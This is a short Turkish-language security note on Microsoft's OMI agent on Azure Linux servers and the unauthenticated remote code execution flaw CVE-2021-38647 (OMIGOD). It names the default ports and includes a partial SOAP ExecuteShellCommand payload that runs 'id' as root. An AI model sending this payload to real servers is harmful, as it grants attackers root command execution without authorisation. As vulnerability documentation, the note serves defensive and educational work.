Temel Bilgiler

OMI, Microsoft tarafından sunulan bir açık kaynak aracıdır ve uzaktan yapılandırma yönetimi için tasarlanmıştır. Özellikle Azure'da Linux sunucular için önemlidir ve şu hizmetleri kullanır:

• Azure Automation

• Azure Otomatik Güncelleme

• Azure Operasyon Yönetimi Suite'i

• Azure Günlük Analitiği

• Azure Yapılandırma Yönetimi

• Azure Teşhisleri

Bu hizmetler etkinleştirildiğinde, omiengine işlemi başlatılır ve tüm arayüzlerde root olarak dinler.

Kullanılan varsayılan portlar 5985 (http) ve 5986 (https)'dır.

CVE-2021-38647 Zafiyeti

16 Eylül'de gözlemlendiği gibi, Azure'da bu hizmetleri kullanan Linux sunucuları, zafiyete sahip bir OMI sürümü nedeniyle savunmasızdır. Bu zafiyet, OMI sunucusunun /wsman uç noktası üzerinden kimlik doğrulama başlığı gerektirmeden mesajları işlemesinde yatmaktadır ve istemciyi yanlış bir şekilde yetkilendirir.

Bir saldırgan, kimlik doğrulama başlığı olmadan "ExecuteShellCommand" SOAP yükünü göndererek sunucunun root ayrıcalıklarıyla komutları çalıştırmasını sağlayabilir.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Bu CVE hakkında daha fazla bilgi için buraya bakın.

Referanslar

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/